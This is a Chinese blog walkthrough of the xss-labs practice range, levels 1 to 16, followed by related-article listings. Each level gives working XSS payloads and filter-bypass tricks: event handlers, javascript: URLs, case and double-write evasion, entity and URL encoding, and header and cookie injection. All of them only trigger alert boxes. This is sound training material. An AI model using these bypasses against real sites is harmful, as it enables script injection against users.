xss-labs

最新推荐文章于 2024-10-04 18:59:12 发布
最新推荐文章于 2024-10-04 18:59:12 发布
阅读量915 收藏 19
点赞数 12
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lht2004/article/details/140829832
版权

第一题

打开页面,我们可以看到第一题为easy xss

第一关的注入点是name 我们可以直接插入一个弹窗

name=<script>alert(1)</script>

很容易便通过了

第二题

来到第二题

我们先试试第一题的语句

发现并不能通过,我们可以通过检查看看源码

我们发现input标签没有闭合,那么可以提前闭合input和value标签

"><script>alert(1)</script>​

也是成功过关

第三题

来到第三题,尝试闭合后依旧无法过关,查看源码发现 < 和 > 符号被过滤了

这里我们可以使用特殊事件执行

'onclick='alert(1)

由于onclick是点击事件,在报错后点击输入框成功过关

第四题

首先还是尝试第一关的语句,发现 < 和 > 符号被过滤了,那我们再尝试特殊事件执行

不过这次要换成双引号包裹

第五题

依旧先尝试输入看看源码

可以看到过滤了script,经过测试发现on也被过滤了

那么我们可以尝试一下伪协议语句,记得提前闭合标签

"><a href="javascript:alert(1)">test</a>

第六题

测试发现script和on依然被过滤,尝试伪协议语句发现href也被过滤了

 

那么既然有过滤我们可以尝试一下是否有限制大小写
 

"><a Href="javascript:alert(1)">test</a>
 

成功绕过
 

 

第七题
 

老样子,先测试
 

 

发现script直接没了,那就好办了,可以通过双写注入绕过过滤
 

"><scrscriptipt>alert(333)</scrscriptipt>
 

第八题
 

测试发现script,on,href全都被过滤了,并且过滤了大小写
 

 

不过我们可以发现数据被传到了href协议中,href在执行时会进行unicode编解码,那么我们可以试试将语句unicode编码后执行
 

javascript:alert(1)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;
 

第九题
 

查看源码我们发现if(false===strpos($str7,'http://'))  http://被注释掉了我们在之前的语句后加一个http://注释掉//http://
 

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://
 

 

第十题
 

查看网页源码,发现文本框可能被隐藏了,修改type来看是否可以显示文本框
 

a&t_history=b&t_sort=c" type="text"
 

 

之后我们尝试在此基础上加入事件注入
 

&t_sort=" type='text' onclick=javascript:alert(12)>//
 

 

第十一题
 

第十一题文本框依旧被隐藏了,尝试之前的方法发现没有效果
 

 

检查后发现双引号被转义了,我们查看源代码可以看到HTTP_REFERER,这是用来获取referer字段的,那我们可以通过hackbar修改referer字段来注入
 

aaa"type="text" onclick="alert(1)
 

 

第十二题
 

依旧先查看源码,发现http_user_agent
 

 

那么我们依然可以按照第十一题的思路,在user_agent上进行注入
 

我这里是构建了一个点击事件
 

" type="text" onclick="alert(1)
 

 

第十三题
 

我们先看html代码,发现还是有四个地方可以进行传参,不过有个地方会引起我们的注意,那就是
 

cook,会让我们联想到cookie
 

 

那么我们可以尝试一下通过cookie注入
 

user="type="text" onclick="alert(1)
 

 

第十四题
 

第十四题有些问题,可以直接跳到十五题
 

第十五题
 

看一下源码,我们发现令人注意的有一个src
 

 

可以尝试一下往src里注入一个弹框,会发现我们输入的东西被注入掉了
 

 

先尝试闭合注入发现依旧无法执行
 

大致查了一下,由于ng-include 指令,我们的script标签不会被执行,由于这里包含了之前的html源文件,同样也会包含之前题目的xss漏洞
 

所以我们可以引用关卡一的漏洞
 

src='level1.php?name=<img src=1 onerror=alert(1)>'
 

 

第十六题
 

来到第十六题,我们可以看到传送门的截图
 

 

我们看一下源码,发现 script, 空格 和 / 都被编码了
 

 

那么正常的语句就无法实现了
 

那么我们就要构建一个不需要使用到被过滤的字符的语句了
 

首先考虑到 / 被过滤了,那么我们只能使用不需要闭合的标签<img>
 

之后我们需要构建语句,由于空格被过滤了,我们只能使用回车替代
 

<img
src=1
​​​​​​​onerror="alert(1)">
 

但是既然要把语句输入到url中,那必须解决回车的问题
 

我们可以把回车进行url编码,在加入到语句中去
 

<img%0Asrc=x%0Aonerror="alert(1)">
 

成功过关
 

 

 

 

 

 

 

 

 

 


                

        

        

    

  


    

      

        

            

              
                
                  xcc7
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
xss-labs-master.rar

				
			

			

				

					05-09
				

			

		

		

			
				
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。  一、XSS...

			
		

	



                

              
                



	

		

			

				
					
xss-labs-master源码

				
			

			

				

					07-06
				

			

		

		

			
				
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...

			
		

	



                


  
              

                


	

		

			

				
					
xss-labs-master.zip(xss注入通关游戏/靶场)

				
			

			

				

					03-21
				

			

		

		

			
				
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。  **XSS分类**  1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...

			
		

	





	

		

			

				
					
安装xss-labs ppt手册

				
			

			

				

					10-22
				

			

		

		

			
				
**XSS漏洞详解与XSS-Labs安装指南**  XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...

			
		

	



		

			
		



	

		

			

				
					
xss-labs.zip

				
			

			

				

					03-18
				

			

		

		

			
				
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。  XSS攻击通常分为三种类型:...

			
		

	





	

		

			

				
					
Pikachu-Cross-Site Scripting-xss盲打

				
			

			

				

					guanrongl的专栏
				

				

					10-03
					
					316
					
				

			

		

		

			
				
xss盲打,不是一种漏洞类型,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;

			
		

	





	

		

			

				
					
PIKACHU | PIKACHU 靶场 XSS 后台配置

				
			

			

				

					Blue17 の 小窝
				

				

					09-30
					
					866
					
				

			

		

		

			
				
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。

			
		

	





	

		

			

				
					
XSS(内含DVWA)

				
			

			

				

					m0_73902453的博客
				

				

					09-27
					
					886
					
				

			

		

		

			
				
反射型 XSS:即时反射,依赖用户点击链接,通常是一次性的。存储型 XSS:恶意代码存储在服务器上,多次执行,影响广泛。DOM型 XSS:常在客户端,通过操控 DOM 元素来执行,无需与服务器交互。

			
		

	





	

		

			

				
					
Pikachu-xss防范措施 - href输出 & js输出

				
			

			

				

					guanrongl的专栏
				

				

					10-03
					
					417
					
				

			

		

		

			
				
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。

			
		

	





	

		

			

				
					
Pikachu-Cross-Site Scripting-反射型xss(get)

				
			

			

				

					guanrongl的专栏
				

				

					10-02
					
					518
					
				

			

		

		

			
				
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;

			
		

	





	

		

			

				
					
XSS基础

				
			

			

				

					2302_81328699的博客
				

				

					10-01
					
					345
					
				

			

		

		

			
				
【代码】XSS基础

			
		

	





	

		

			

				
					
XSS简介

				
			

			

				

					weixin_63175492的博客
				

				

					10-04
					
					240
					
				

			

		

		

			
				
XSS攻击,通常是指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的攻击。在一开始,这种攻击演示是跨域的,所有叫做"跨站脚本"。跨站脚本攻击,英文全称是Cross Site Script ,本来缩写是CSS,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS长期以来被列为客户端web安全中的头号大敌,因为XSS破坏力强大,且产生的场景复杂,难以一次性解决。那么,什么是XSS呢?

			
		

	





	

		

			

				
					
Pikachu-Cross-Site Scripting-xss之htmlspecialchars

				
			

			

				

					guanrongl的专栏
				

				

					10-03
					
					226
					
				

			

		

		

			
				
查看页面元素,可以看到这里对一些符号做了转换,但是 单引号等几个符号没处理;提交,得到xss攻击。

			
		

	





	

		

			

				
					
Pikachu-Cross-Site Scripting-DOM型xss_x

				
			

			

				

					guanrongl的专栏
				

				

					10-02
					
					199
					
				

			

		

		

			
				
获取text内容,赋值给xss 然后拼接到 dom 里;查看代码,输入的内容,通过get请求方式,用text 参数带过去;所以str 为 #' onclick="alert(11)">输入,得到xss 结果。

			
		

	





	

		

			

				
					
[Meachines] [Easy] Sea WonderCMS-XSS-RCE+System Monitor 命令注入

					
最新发布

				
			

			

				

					
				

				

					10-04
					
					290
					
				

			

		

		

			
				
#WonderCMS-XSS-RCE #System Monitor 命令注入

			
		

	





	

		

			

				
					
【CTF Web】Pikachu 反射型xss(get) Writeup(反射型XSS+GET请求)

				
			

			

				

					HEX9CF的技术博客
				

				

					09-28
					
					643
					
				

			

		

		

			
				
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。

			
		

	





	

		

			

				
					
Vue根实例、实例总结

				
			

			

				

					m0_54007573的博客
				

				

					10-04
					
					365
					
				

			

		

		

			
				
Vue根实例、实例总结

			
		

	





	

		

			

				
					
Vue实战教程:如何用JS封装一个可复用的Loading组件

				
			

			

				

					Jiaberrr的博客
				

				

					09-28
					
					590
					
				

			

		

		

			
				
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。

			
		

	





	

		

			

				
					
登录功能开发 P167重点

				
			

			

				

					2303_81204446的博客
				

				

					09-30
					
					367
					
				

			

		

		

			
				
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。

			
		

	





	

		

			

				
					
xss-labs安装

				
			

			

				

					07-28
				

			

		

		

			
				
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路即可,因为在实际的应用中,很少会有这种复杂的情况,但在CTF比赛中可能会更常见。

根据引用\[2\],XSS-labs的安装和下载可以通过相关的渗透测试平台或者从官方网站获取。安装完成后,可以开始进行XSS攻击的实践。

在XSS-labs中,可以通过构造特定的payload来触发XSS漏洞。根据引用\[2\]和\[3\]的示例,可以使用ng-include或者src参数来构造包含XSS漏洞的URL。例如,可以构造一个类似于以下的payload来触发XSS漏洞:

src='level1.php?name=<a type="text" href="javascript:alert(1)">'

或者

127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">'

通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法行为,请遵守法律法规并仅在合法授权的情况下进行安全测试。
#### 引用[.reference_title]
-  *1* *2* [渗透学习-靶场篇-XSS-labs(持续更新中)](https://blog.csdn.net/qq_43696276/article/details/127024861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
-  *3* [xss-labs搭建及通关攻略](https://blog.csdn.net/K_ShenH/article/details/122765092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值